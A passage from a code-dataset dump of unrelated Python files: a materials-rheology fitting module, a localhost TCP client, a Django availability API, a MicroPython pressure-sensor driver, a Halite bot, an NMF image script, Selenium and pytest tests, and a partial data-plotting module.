:math:`W(\\mathbf{F}(\\lambda_h,\\lambda_v))` is then minimized numerically for every\r\n :math:`\\lambda_h` to obtain the :math:`\\lambda_v` that results in the lowest energy of the system.\r\n\r\n Parameters\r\n ----------\r\n lambda_h : ndarray\r\n The applied stretching in horizontal direction.\r\n lambda_v : ndarray\r\n The different values for thinning to test. The value with the lowest energy for each horizontal stretch is\r\n returned.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n lambda_h : ndarray\r\n The horizontal stretching values.\r\n lambda_v : ndarray\r\n The vertical stretching that minimizes the energy for the horizontal stretching.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F00, F22 = np.meshgrid(lambda_v, lambda_h)\r\n F11 = np.ones_like(F00)\r\n F = np.dstack((F00, F11, F22))\r\n\r\n s_bar = np.einsum(\"hvj,bj->hvjb\", F, s)\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n eps = material.energy(s_abs - 1)\r\n W = np.mean(eps, axis=-1)\r\n\r\n index = np.argmin(W, axis=1)\r\n return lambda_h, lambda_v[index]\r\n\r\n\r\ndef getExtensionalRheometerStress(epsilon, material, s=None):\r\n r\"\"\"\r\n Get the stress for a given strain of the material in an extensional rheometer.\r\n\r\n The following deformation :math:`\\mathbf{F}` is applied to the material:\r\n\r\n .. math::\r\n \\mathbf{F}(\\gamma) =\r\n \\begin{pmatrix}\r\n \\epsilon & 0 & 0 \\\\\r\n 0 & 1 & 0 \\\\\r\n 0 & 0 & 1 \\\\\r\n \\end{pmatrix}\r\n\r\n and the resulting stress is obtained by calculating numerically the derivative of the energy density :math:`W` with\r\n respect to the strain :math:`\\epsilon`:\r\n\r\n .. math::\r\n \\sigma(\\gamma) = \\frac{dW(\\mathbf{F}(\\gamma))}{d\\epsilon}\r\n\r\n\r\n Parameters\r\n ----------\r\n epsilon : ndarray\r\n The applied strain.\r\n material : :py:class:`~.materials.Material`\r\n The material model to use.\r\n\r\n Returns\r\n -------\r\n strain : ndarray\r\n The strain values.\r\n stress : ndarray\r\n The resulting stress.\r\n \"\"\"\r\n if s is None:\r\n s = buildBeams(30)\r\n\r\n F = np.eye(3)\r\n F = np.tile(F, (epsilon.shape[0], 1, 1))\r\n F[:, 0, 0] = epsilon\r\n\r\n s_bar = F @ s.T\r\n\r\n s_abs = np.linalg.norm(s_bar, axis=-2)\r\n\r\n eps = material.energy(s_abs - 1)\r\n\r\n W = np.mean(eps, axis=-1)\r\n dW = np.diff(W) / np.diff(epsilon)\r\n return epsilon[:-1] + np.diff(epsilon) / 2, dW\r\n\r\n\r\nimport numpy as np\r\nfrom scipy import interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom saenopy.materials import SemiAffineFiberMaterial\r\n\r\ndef fit_error(xy, xy0, w=None):\r\n # split the data\r\n x, y = xy\r\n x0, y0 = xy0.T\r\n # interpolate the fit to ensure we have values at the correct x positions\r\n f = interpolate.interp1d(x, y, bounds_error=False)\r\n # evaluate the interpolated fit at the x0 values and calculate the squared difference to the y0 values\r\n difference = (y0-f(x0))**2\r\n # if we have no weights\r\n if w is None:\r\n # just take the mean (ignoring nans)\r\n return np.sqrt(np.nanmean(difference))\r\n # if not ignore the nans by finding the indices\r\n indices = ~np.isnan(difference)\r\n # and average with the given weights\r\n return np.sqrt(np.average(difference[indices], weights=w[indices]))\r\n\r\n\r\ndef get_cost_function(func, data_shear1, params):\r\n # find a reasonable range of shear values\r\n x0 = data_shear1[:, 0]\r\n dx = x0[1] - x0[0]\r\n gamma1 = np.linspace(np.min(x0), np.max(x0), 1000)\r\n\r\n # define weights for logarithmic weighting of points of the shear data\r\n weights1 = np.diff(np.log(x0), append=np.log(x0[-1] + np.diff(x0[-3:-1])[0])) ** 2\r\n\r\n # weights1[:] = 1\r\n\r\n def cost(p):\r\n material = SemiAffineFiberMaterial(*params(p))\r\n # print(material)\r\n return fit_error(func(gamma1, material), data_shear1, weights1)\r\n\r\n def plot(p):\r\n def plot_me():\r\n material = SemiAffineFiberMaterial(*params(p))\r\n plt.plot(data_shear1[:, 0], data_shear1[:, 1], \"o\", label=\"data\")\r\n\r\n x, y = func(gamma1, material)\r\n plt.plot(x, y, \"r-\", lw=3, label=\"model\")\r\n return plot_me\r\n\r\n return cost, plot\r\n\r\n\r\ndef get_cost_function_log(func: callable, data_shear1: np.ndarray, params: Sequence):\r\n # find a reasonable range of shear values\r\n x0 = data_shear1[:, 0]\r\n dx = x0[1] - x0[0]\r\n gamma1 = np.arange(0.004, 0.25, 0.001)\r\n\r\n # define weights for logarithmic weighting of points of the shear data\r\n weights1 = np.diff(np.log(x0), append=np.log(x0[-1] + np.diff(x0[-3:-1])[0])) ** 2\r\n # weights1[:] = 1\r\n\r\n data_shear1 = np.log(data_shear1)\r\n\r\n def cost(p):\r\n material = SemiAffineFiberMaterial(*params(p))\r\n # print(material)\r\n return fit_error(np.log(func(gamma1, material)), data_shear1, weights1)\r\n\r\n return cost\r\n\r\n\r\ndef minimize(cost_data: list, parameter_start: Sequence, method='Nelder-Mead', maxfev:int = 1e4, **kwargs):\r\n costs = []\r\n plots = []\r\n\r\n for func, data, params in cost_data:\r\n if func == getStretchThinning:\r\n def func(x, material):\r\n lambda_v = np.arange(0, 1.1, 0.01)\r\n return getStretchThinning(x, lambda_v, material)\r\n c, p = get_cost_function(func, data, params)\r\n costs.append(c)\r\n plots.append(p)\r\n\r\n from tqdm.notebook import tqdm\r\n pbar = tqdm(total=maxfev)\r\n\r\n # define the cost function\r\n def cost(p):\r\n pbar.update(1)\r\n return sum([c(p) for c in costs])\r\n\r\n # minimize the cost with reasonable start parameters\r\n from scipy.optimize import minimize\r\n sol = minimize(cost, parameter_start, method=method, options={'maxfev': maxfev}, **kwargs)\r\n\r\n if sol.success is True:\r\n pbar.close()\r\n\r\n def plot_all():\r\n subplot_index = 0\r\n subplot_dict = {}\r\n for func, data, params in cost_data:\r\n if func not in subplot_dict:\r\n subplot_index += 1\r\n subplot_dict[func] = subplot_index\r\n\r\n for func in subplot_dict:\r\n subplot_dict[func] = plt.subplot(1, subplot_index, subplot_dict[func])\r\n if func == getShearRheometerStress or func == getExtensionalRheometerStress:\r\n plt.xlabel(\"strain\")\r\n plt.ylabel(\"stress\")\r\n if func == getStretchThinning:\r\n plt.xlabel(\"horizontal stretch\")\r\n plt.ylabel(\"vertical contraction\")\r\n\r\n for (func, data, params), p in zip(cost_data, plots):\r\n plt.sca(subplot_dict[func])\r\n p(sol.x)()\r\n\r\n return sol.x, plot_all\r\n","sub_path":"saenopy/macro.py","file_name":"macro.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"352475785","text":"#!/usr/bin/python\nimport socket\nhost = '127.0.0.1'\nport = 18912\nBUFSIZE = 1024\ntcpClient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ntcpClient.connect((host, port))\nwhile True:\n\tdata = raw_input('>enter:')\n\tif not data:\n\t\tbreak\n\ttcpClient.send(data)\n\tdata = tcpClient.recv(BUFSIZE)\n\tif not data:\n\t\tbreak\ntcpClient.close()\n","sub_path":"netsvr/test/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179341373","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport datetime\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom core.constants import TRAIN_CLASSES\nfrom core.models import Train\n\n\ndef availability(request):\n return render(request, 'availability.html')\n\n\ndef availability_api(request, train_number, from_city, to_city,\n date_of_journey, class_name):\n train = get_object_or_404(Train, number=train_number)\n errors = []\n\n # date of journey validations\n try:\n doj = datetime.datetime.strptime(date_of_journey, \"%d-%m-%Y\")\n except:\n errors.append({\n 'date-of-journey': 'Invalid date of Journey. '\n 'Please enter in \"12-04-2017\" form.',\n })\n\n # class validations\n if class_name not in TRAIN_CLASSES:\n errors.append({\n 'class': 'Invalid Class'\n })\n elif class_name not in train.data.get('classes', {}):\n errors.append({\n 'class': \"{} doesn't have {}\".format(train,\n TRAIN_CLASSES[class_name])\n })\n\n # return errors if there are\n if errors:\n return JsonResponse({'errors': errors}, status='400')\n\n # return the computed probability and data\n return JsonResponse({\n 'data': {\n 'train': str(train),\n 'from': from_city,\n 'to': to_city,\n 'date_of_journey': date_of_journey,\n 'class_name': class_name,\n },\n 'probability': 0,\n })\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"415888621","text":"def MS5803(i2c, power_pin=None, ground_pin=None):\r\n \"\"\" A micropython function for reading pressure and temperature from an MS5803 sensor.\r\n \r\n The function assumes that the MS5803 is hooked up according to instructions at \r\n the `cave pearl project `_.\r\n Power and ground should be connected through a 100 nf (104) decoupling capacitor, and CSB\r\n should be pulled high using a 10 kOhm resistor. Tested with MS5803_BA. \r\n Code modified from code originally developed for raspberry pi at the `control everything community `_.\r\n \r\n Parameters\r\n ----------\r\n\ti2c : :obj:'machine.I2C'\r\n\t\tAn I2C bus object\r\n\tpower_pin : :obj:'machine.PIN', optional\r\n\t\tPin object representing the pin used to power the MS5803 \r\n\tground_pin : :obj:'machine.PIN', optional\r\n\t\tPin object representing the pin used to ground the MS5803 (optional)\r\n Returns\r\n -------\r\n pressure : float\r\n Pressure in hPa.\r\n temperature : float\r\n Temperature in degrees C.\r\n \r\n Example\r\n -------\r\n >>> from machine import I2C, Pin\r\n >>> import pressure\r\n >>> i2c = I2C(scl='X9', sda='X10', freq = 100000)\r\n >>> power_pin = Pin('Y7', Pin.OUT_PP)\r\n >>> ground_pin = Pin('Y8', Pin.OUT_PP)\r\n >>> [pres, ctemp] = pressure.MS5803(i2c, power_pin, ground_pin)\r\n \r\n \"\"\"\r\n import time\r\n \r\n #turn on power and turn off ground if necessary\r\n if not(power_pin is None):\r\n power_pin.value(1)\r\n \r\n if not(ground_pin is None):\r\n ground_pin.value(0)\r\n \r\n #check if device is connected--should be at address 118\r\n #i2c.scan()\r\n \r\n # MS5803_05BA address, 0x76(118)\r\n # 0x1E(30) Reset command\r\n reset_command = bytearray([0x1E])\r\n i2c.writeto(0x76, reset_command)\r\n\r\n time.sleep(0.5)\r\n\r\n # Read 12 bytes of calibration data\r\n # Read pressure sensitivity\r\n data = bytearray(2)\r\n data = i2c.readfrom_mem(0x76, 0xA2, 2)\r\n C1 = data[0] * 256 + data[1]\r\n\r\n # Read pressure offset\r\n data = i2c.readfrom_mem(0x76, 0xA4, 2)\r\n C2 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of pressure sensitivity\r\n data = i2c.readfrom_mem(0x76, 0xA6, 2)\r\n C3 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of pressure offset\r\n data = i2c.readfrom_mem(0x76, 0xA8, 2)\r\n C4 = data[0] * 256 + data[1]\r\n\r\n # Read reference temperature\r\n data = i2c.readfrom_mem(0x76, 0xAA, 2)\r\n C5 = data[0] * 256 + data[1]\r\n\r\n # Read temperature coefficient of the temperature\r\n data = i2c.readfrom_mem(0x76, 0xAC, 2)\r\n C6 = data[0] * 256 + data[1]\r\n\r\n # MS5803_05BA address, 0x76(118)\r\n # 0x40(64) Pressure conversion(OSR = 256) command\r\n pressure_command = bytearray([0x40])\r\n i2c.writeto(0x76, pressure_command)\r\n\r\n time.sleep(0.5)\r\n\r\n # Read digital pressure value\r\n # Read data back from 0x00(0), 3 bytes\r\n # D1 MSB2, D1 MSB1, D1 LSB\r\n value = bytearray(3)\r\n value = i2c.readfrom_mem(0x76, 0x00, 3)\r\n D1 = value[0] * 65536 + value[1] * 256 + value[2]\r\n\r\n # MS5803_05BA address, 0x76(118)\r\n # 0x50(64) Temperature conversion(OSR = 256) command\r\n temperature_command = bytearray([0x50])\r\n i2c.writeto(0x76, temperature_command)\r\n time.sleep(0.5)\r\n\r\n # Read digital temperature value\r\n # Read data back from 0x00(0), 3 bytes\r\n # D2 MSB2, D2 MSB1, D2 LSB\r\n\r\n value = i2c.readfrom_mem(0x76, 0x00, 3)\r\n D2 = value[0] * 65536 + value[1] * 256 + value[2]\r\n\r\n dT = D2 - C5 * 256\r\n TEMP = 2000 + dT * C6 / 8388608\r\n OFF = C2 * 262144 + (C4 * dT) / 32\r\n SENS = C1 * 131072 + (C3 * dT ) / 128\r\n T2 = 0\r\n OFF2 = 0\r\n SENS2 = 0\r\n\r\n if TEMP > 2000 :\r\n T2 = 0\r\n OFF2 = 0\r\n SENS2 = 0\r\n elif TEMP < 2000 :\r\n T2 = 3 * (dT * dT) / 8589934592\r\n OFF2 = 3 * ((TEMP - 2000) * (TEMP - 2000)) / 8\r\n SENS2 = 7 * ((TEMP - 2000) * (TEMP - 2000)) / 8\r\n if TEMP < -1500 :\r\n SENS2 = SENS2 + 3 * ((TEMP + 1500) * (TEMP +1500))\r\n\r\n TEMP = TEMP - T2\r\n OFF = OFF - OFF2\r\n SENS = SENS - SENS2\r\n pressure = ((((D1 * SENS) / 2097152) - OFF) / 32768.0) / 100.0\r\n cTemp = TEMP / 100.0\r\n fTemp = cTemp * 1.8 + 32\r\n\r\n # Output data to screen\r\n print(\"Pressure : %.2f mbar\" %pressure)\r\n print(\"Temperature in Celsius : %.2f C\" %cTemp)\r\n print(\"Temperature in Fahrenheit : %.2f F\" %fTemp)\r\n \r\n if not(power_pin is None):\r\n power_pin.value(0)\r\n \r\n return([pressure, cTemp])","sub_path":"pressure.py","file_name":"pressure.py","file_ext":"py","file_size_in_byte":4695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"597801236","text":"import hlt\nfrom hlt import constants\nfrom hlt.positionals import Direction, Position\nimport functions\n\nimport random\n# (print statements) are reserved for the engine-bot communication.\nimport logging\n\n\n\"\"\" <<>> \"\"\"\n\n# This game object contains the initial game state.\ngame = hlt.Game()\n\ngh = {}\n\n# At this point \"game\" variable is populated with initial map data.\n# This is a good place to do computationally expensive start-up pre-processing.\n# As soon as you call \"ready\" function below, the 2 second per turn timer will start.\ngame.ready(\"Testbot v5\")\n\n# Now that your bot is initialized, save a message to yourself in the log file with some important information.\n# Here, you log here your id, which you can always fetch from the game object by using my_id.\nlogging.info(\"Successfully created bot! My Player ID is {}.\".format(game.my_id))\n\n\"\"\" <<>> \"\"\"\n\nwhile True:\n game.update_frame()\n # You extract player metadata and the updated map metadata here for convenience.\n me = game.me\n if game.turn_number == 1:\n shipyard = me.shipyard.position\n '''logging.info(str(me.shipyard))\n logging.info(type(me.shipyard))\n try:\n logging.info(type(me.shipyard.position))\n logging.info(str(me.shipyard.position))\n except:\n pass'''\n game_map = game.game_map\n\n command_queue = []\n move_queue = []\n\n for ship in me.get_ships(): \n if ship.position == shipyard:\n gh[ship.id] = False \n com, move_queue = functions.max_halite(game_map, ship, move_queue)\n command_queue.append(com)\n \n elif gh[ship.id] or ship.halite_amount >700:\n move = game_map.naive_navigate(ship, shipyard)\n if move != Direction.Still:\n pos = Position(move[0], move[1])+ship.position\n if pos in move_queue:\n move = Direction.Still\n else:\n move_queue.append(pos)\n command_queue.append(ship.move(move))\n \n \n #game_map.naive_navigate(ship, shipyard)))\n gh[ship.id] = True\n \n \n elif game_map[ship.position].halite_amount >= constants.MAX_HALITE / 10:\n command_queue.append(ship.stay_still())\n \n else:\n com, move_queue = functions.max_halite(game_map, ship, move_queue)\n command_queue.append(com)\n \n '''\n if ship.halite_amount>400:\n command_queue.append(\n ship.move(\n game_map.naive_navigate(ship, shipyard)))\n \n \n elif game_map[ship.position].halite_amount < constants.MAX_HALITE / 10:\n command_queue.append(\n ship.move(\n random.choice([ Direction.North, Direction.South, Direction.East, Direction.West ])))\n else:\n command_queue.append(ship.stay_still())\n '''\n if game.turn_number<200 and me.halite_amount >= constants.SHIP_COST and not game_map[me.shipyard].is_occupied:\n command_queue.append(me.shipyard.spawn())\n\n # Send your moves back to the game environment, ending this turn.\n game.end_turn(command_queue)\n\n","sub_path":"MyBotv4.py","file_name":"MyBotv4.py","file_ext":"py","file_size_in_byte":3263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583553191","text":"#https://qiita.com/hibit/items/8f0525ab1b616061c630\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import NMF\nimport copy\n\nsample_num = 1000\n\n\nX = []\nY = []\nsample_num += 1\n\nfor i in range(1, sample_num):\n filename = './nmf_ex4/' + str(i) + '.png'\n img = cv2.imread(filename)\n #img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = cv2.bitwise_not(img)\n img = img.reshape(64*64)/255\n X.append(img)\n\n#画像1つの要素は行(高さ) x 列(幅) x 色(3)の三次元のndarrayとなる https://note.nkmk.me/python-opencv-imread-imwrite/\n#print(img.shape)\nY = copy.deepcopy(X)\n'''\nX = np.array(X)\nnmf = NMF(n_components=15)\nnmf.fit(X)\nX_nmf = nmf.transform(X)\nprint(X_nmf.shape, nmf.components_.shape)\n'''\n\nY = np.array(Y)\nY = Y.T\nprint(Y.shape)\nY = Y.reshape(4096, -1)\nnmf2 = NMF(n_components=90)\nW = nmf2.fit_transform(Y) # 学習\nH = nmf2.components_\n\nprint(W.shape, H.shape)\n#print(H.shape)\n\nim = np.dot(W, H)\n#print(im.shape)\nim = im.T\n#print(im.shape, im[0].shape)\nprint(im[0].reshape(64, 64).shape)\n\nplt.imshow(im[0].reshape(64, 64),cmap='Greys')\nplt.show()\n\n","sub_path":"nmf/nmf_ex4_anime_plus_grey.py","file_name":"nmf_ex4_anime_plus_grey.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"425704640","text":"import random\nfrom tkinter import *\n\nclass Game():\n def __init__(self):\n\n self.root = Tk()\n self.root.title(\"Minröj\")\n self.root.geometry(\"+800+200\")\n self.frame = Frame(self.root)\n self.frame.pack(side=TOP, padx=10, pady=10)\n self.frameHead = Frame(self.root)\n self.frameHead.pack(side=BOTTOM, pady=10)\n self.modeButton = Button(self.frameHead, command=lambda: self.clickMode(), text=\"Skjut\")\n self.modeButton.pack()\n\n self.flag = 0\n self.gridSize = int(input(\"Spelplansstorlek: \"))\n self.mineCount = int(input(\"Antal minor: \"))\n self.flagCount = 0\n self.mineLeft = self.mineCount\n self.board = self.gameBoard(self.gridSize, self.root, self.frame)\n self.mineRandList = self.randMines(self.board, self.gridSize, self.mineCount)\n self.insertMines(self.board, self.mineRandList)\n self.checkMines(self.board)\n\n #self.showBoard(self.board)\n\n def gameBoard(self, gridSize, root, frame):\n board = []\n for i in range(1,gridSize+1):\n col = []\n for j in range(1,gridSize+1): \n col.append(Mine(0, 0, 0, j-1, i-1, 0, root, frame))\n board.append(col)\n return board\n\n def randMines(self, board, gridSize, mineCount):\n mineList = []\n mineRandList = []\n for i in board:\n for j in i:\n mineList.append((j.cordX, j.cordY))\n for i in range(int(mineCount)):\n mineListCheck = mineList.pop(mineList.index(random.choice(mineList)))\n mineRandList.append(mineListCheck)\n return mineRandList\n\n def insertMines(self, board, mineRandList):\n for i in board:\n for k in i:\n mineCords = (k.cordX, k.cordY)\n if mineCords in mineRandList:\n k.mineStatus = 1\n\n def checkMines(self, board):\n for i in board:\n for k in i:\n moves = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n for j in moves:\n try:\n cordNewX = k.cordX + j[0]\n cordNewY = k.cordY + j[1]\n\n if cordNewX > -1 and cordNewY > -1:\n k.minesAround += board[cordNewY][cordNewX].mineStatus\n\n except IndexError:\n pass\n\n## def showBoard(self, board):\n## row = []\n## for i in board:\n## col = []\n## for k in i:\n## if(k.mineStatus == 1):\n## col.append(\"#\")\n## else:\n## col.append((str(k.minesAround)))\n## row.append(col)\n## for i in row:\n## print(i)\n \n \n def click(self, x, y):\n if(self.flag == 0):\n \n if(self.board[y][x].mineStatus == 0):\n \n if(self.board[y][x].minesAround != 0): #Visa ruta \n self.board[y][x].button[\"text\"] = self.board[y][x].minesAround\n self.board[y][x].clickStatus = 1\n else:\n self.getNeigh(x, y) #Visa omkringliggande \n\n else: #Game Over\n for i in self.board:\n for k in i:\n if(k.mineStatus == 1):\n k.button[\"text\"] = \"#\"\n else:\n if(k.minesAround == 0):\n k.button[\"text\"] = \"\"\n else:\n k.button[\"text\"] = k.minesAround\n else: #Flagga ruta\n if(self.board[y][x].clickStatus == 0):\n \n if(self.board[y][x].flagStatus == 0): \n self.board[y][x].flagStatus = 1\n self.flagCount +=1\n self.board[y][x].button[\"text\"] = \"F\"\n if(self.board[y][x].mineStatus == 1):\n self.mineLeft -= 1\n # print(\"minor kvar: \", self.mineLeft)\n # print(\"placerade flaggor: \", self.flagCount)\n if(self.mineLeft == 0 and self.flagCount <= self.mineCount):\n print(\"Grattis du vann\")\n else:\n self.board[y][x].flagStatus = 0\n self.flagCount -=1\n self.board[y][x].button[\"text\"] = \"\"\n if(self.board[y][x].mineStatus == 1):\n self.mineLeft += 1\n else:\n pass\n\n \n def getNeigh(self, x, y):\n moves = [(-1, -1), (0, -1), (1, -1), (-1, 0), (1, 0), (-1, 1), (0, 1), (1, 1)]\n zeroList = [(x, y)]\n while(zeroList):\n for j in moves:\n try:\n cordNewX = zeroList[0][0] + j[0]\n cordNewY = zeroList[0][1] + j[1]\n\n if (cordNewX > -1 and cordNewY > -1) and (cordNewX < game.gridSize and cordNewY < game.gridSize):\n if(self.board[cordNewY][cordNewX].clickStatus == 0):\n\n if(self.board[cordNewY][cordNewX].minesAround != 0):\n self.board[cordNewY][cordNewX].button[\"text\"] = self.board[cordNewY][cordNewX].minesAround\n self.board[cordNewY][cordNewX].clickStatus = 1\n else:\n zeroList.append((cordNewX, cordNewY))\n self.board[cordNewY][cordNewX].button[\"text\"] = \"0\"\n self.board[cordNewY][cordNewX].clickStatus = 1\n \n except IndexError:\n pass\n \n self.board[y][x].clickStatus = 1\n zeroList.pop(0)\n self.board[y][x].button[\"text\"] = \"0\"\n \n def clickMode(self):\n if(self.flag == 0):\n self.flag = 1\n self.modeButton[\"text\"] = \"Flagga\"\n else:\n self.flag = 0\n self.modeButton[\"text\"] = \"Skjut\"\n\nclass Mine():\n def __init__(self, mineStatus, clickStatus, minesAround, cordX, cordY, flagStatus, root, frame):\n self.mineStatus = mineStatus\n self.clickStatus = clickStatus\n self.minesAround = minesAround\n self.cordX = cordX\n self.cordY = cordY\n self.flagStatus = flagStatus\n \n self.button = Button(\n frame,\n command=lambda: Game.click(game, self.cordX, self.cordY)\n )\n self.button.config(width=\"4\",height=\"2\", bg=\"black\", fg=\"white\")\n self.button.grid(column=self.cordX, row=self.cordY)\n\ngame = Game()\n \n#def main():\n# root = Tk()\n# game = Game(root)\n#main()\n\n\n \n\n","sub_path":"MarcusMinesweeper.py","file_name":"MarcusMinesweeper.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"614590561","text":"import pytest\nimport time\n\nfrom .pages.basket_page import BasketPage\nfrom .pages.login_page import LoginPage\nfrom .pages.product_page import ProductPage\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207\"\n\n\nclass TestProductPage:\n\n @pytest.mark.xfail\n def test_guest_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_not_product_added_to_basket()\n\n def test_guest_cant_see_success_message(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n # Assert\n page.is_not_product_added_to_basket()\n\n @pytest.mark.xfail\n def test_message_disappeared_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_success_message_disappeared_after_adding_to_basket()\n\n def test_guest_cant_see_product_in_basket_opened_from_product_page(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.go_to_basket_by_button_in_header()\n basket_page = BasketPage(browser, browser.current_url)\n # Assert\n basket_page.basket_items_are_not_present()\n basket_page.basket_empty_text_is_present()\n\n\nclass TestUserAddToBasketFromProductPage:\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup(self, browser):\n page = ProductPage(browser, link)\n page.open()\n page.go_to_login_page()\n login_page = LoginPage(browser, browser.current_url)\n email = str(time.time()) + \"@fakemail.org\"\n password = str(time.time())\n login_page.register_new_user(email, password)\n login_page.should_be_authorized_user()\n\n @pytest.mark.xfail\n def test_user_cant_see_success_message_after_adding_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_not_product_added_to_basket()\n\n @pytest.mark.xfail\n def test_user_can_add_product_to_basket(self, browser):\n # Arrange\n page = ProductPage(browser, link)\n page.open()\n # Act\n page.add_product_to_basket()\n # Assert\n page.is_product_added_to_basket()\n","sub_path":"final/test_product_page.py","file_name":"test_product_page.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"619339764","text":"\n\nfrom xai.brain.wordbase.nouns._slugger import _SLUGGER\n\n#calss header\nclass _SLUGGERS(_SLUGGER, ):\n\tdef __init__(self,): \n\t\t_SLUGGER.__init__(self)\n\t\tself.name = \"SLUGGERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"slugger\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_sluggers.py","file_name":"_sluggers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"203709637","text":"from unittest.mock import MagicMock\n\nimport pytest\nfrom option import Some\nimport os\nimport psycopg2\n\nfrom core.tests.generation.fake_course import fake_course, fake_section\nfrom core.presistence.course_persistence import CoursePresistence\nfrom core.presistence.instructor_persistence import InstructorPersistence\n\n\n@pytest.fixture()\ndef course_presistence() -> CoursePresistence:\n conn = psycopg2.connect(\n host=os.getenv(\"OHS_DB_HOST\"),\n dbname=os.getenv(\"OHS_DB_NAME\"),\n user=os.getenv(\"OHS_DB_USER\"),\n password=os.getenv(\"OHS_DB_PASSWORD\"),\n )\n yield CoursePresistence(lambda: conn)\n conn.close()\n\n\n@pytest.fixture()\ndef instructor_presistance() -> InstructorPersistence:\n conn = psycopg2.connect(\n host=os.getenv(\"OHS_DB_HOST\"),\n dbname=os.getenv(\"OHS_DB_NAME\"),\n user=os.getenv(\"OHS_DB_USER\"),\n password=os.getenv(\"OHS_DB_PASSWORD\"),\n )\n yield InstructorPersistence(lambda: conn)\n conn.close()\n\n\nclass TestCreateCourse:\n def test_success(self, course_presistence):\n course = fake_course()\n assert course_presistence.create_course(course).unwrap() == course\n assert course_presistence.get_course(course.course_code).unwrap() == course\n\n def test_duplicate(self, course_presistence):\n course = fake_course()\n course_presistence.get_course = MagicMock(return_value=Some(course))\n assert (\n course_presistence.create_course(course).unwrap_err()\n == f\"Course {course} already exists\"\n )\n\n\nclass TestCreateSection:\n def test_success(self, course_presistence, instructor_presistance):\n section = fake_section()\n course_presistence.create_course(section.course)\n instructor_presistance.create_instructor(section.taught_by, \"aaaaa\")\n assert course_presistence.create_section(section).unwrap() == section\n assert course_presistence.get_section(section.identity).unwrap() == section\n course_presistence.delete_section(section.identity)\n course_presistence.delete_course(section.course)\n instructor_presistance.delete_instructor(section.taught_by)\n\n def test_invalid_course(self, course_presistence):\n section = fake_section()\n assert (\n course_presistence.create_section(section).unwrap_err()\n == f\"Course {section.course} does not exist\"\n )\n assert course_presistence.get_section(section.identity).is_none\n\n def test_duplicate(self, course_presistence):\n section = fake_section()\n course_presistence.get_section = MagicMock(return_value=Some(section))\n assert (\n course_presistence.create_section(section).unwrap_err()\n == f\"Section {section} already exists\"\n )\n","sub_path":"backend/core/tests/presistence/test_course_presistence.py","file_name":"test_course_presistence.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174723093","text":"import os\nfrom enum import Enum\nfrom typing import List, Union, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nimport seaborn as sns\n\nfrom airl_2D_colormap import AIRL_ColorMap\n\n\nclass OptionsColor(Enum):\n COLORMAP = 0\n RGB = 1\n\n\nclass Components(Enum):\n GROUND_TRUTH = 0\n LATENT_COMPONENT = 1\n VALUE_FITNESS = 2\n VALUE_FITNESS_IMPLICIT = 3\n NOVELTY = 4\n\n\ndef read_data(file_path: str,\n list_names_components: List[str],\n convert_to_float_numpy_array: bool = True\n ) -> dict:\n dict_data_per_component = {name_data: [] for name_data in list_names_components}\n\n with open(file_path, 'r') as file:\n for line in file.readlines():\n list_different_components = filter(bool, line.split(' '))\n list_different_components = list(map(str.strip, list_different_components))\n list_different_components = [component.split(' ') for component in list_different_components]\n\n for index_component, name_component in enumerate(list_names_components):\n dict_data_per_component[name_component].append(list_different_components[index_component])\n\n try:\n if convert_to_float_numpy_array:\n for name_component in list_names_components:\n dict_data_per_component[name_component] = 